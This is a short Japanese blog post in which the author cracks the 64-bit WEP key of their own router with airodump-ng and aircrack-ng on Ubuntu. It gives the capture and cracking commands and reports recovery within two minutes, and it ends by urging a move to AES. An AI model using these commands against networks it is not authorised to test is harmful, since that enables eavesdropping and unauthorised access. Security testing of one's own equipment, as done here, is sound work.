WPA TKIPが数十秒で解析に触発されWEP解析
WPA TKIPが数十秒で解析できる論文が出たので、今更ながらWEPを解読にチャレンジしました。
手持ちのパソコンにある無線LANをチェックすると、airodump-ng が使えるのは X40とEeePCでした。
EeeBOX: RT2860
IBM X40: Atheros
Mac Book Pro: AirMac Extreme (802.11n)
EeePC 900HA: Atheros
X40のubuntuにaircrack-ngをインストールしWEP解析とします。
# aptitude install aircrack-ng // v1.0 rc3 がインストールされた。 # ifconfig # ifconfig wlan0 down # airodump-ng wlan0
で簡単に実行できた。
自分のルーターのBSSIDが出てきたのでCH指定でログを保存
# airodump-ng -c 11 -d [BSSID] -w 0908 wlan0
あとは、大量にパケットを流す。
今回は盗聴を前提として別PCからWEP利用して動画閲覧。
10分程放置した後、溜まったパケットを解析
# aircrack-ng 0908-01.cap
ルーターのWEP は64Bit暗号化 していたが、1分40秒くらいで解析結果を返す。
何回か試してみたが、数秒〜2分内で解析できて認証キーを返す。
WEPは簡単に解析出来てしまいました。TKIPも似たように解析できるのでしょうね。
今後はAESに移行が必要です。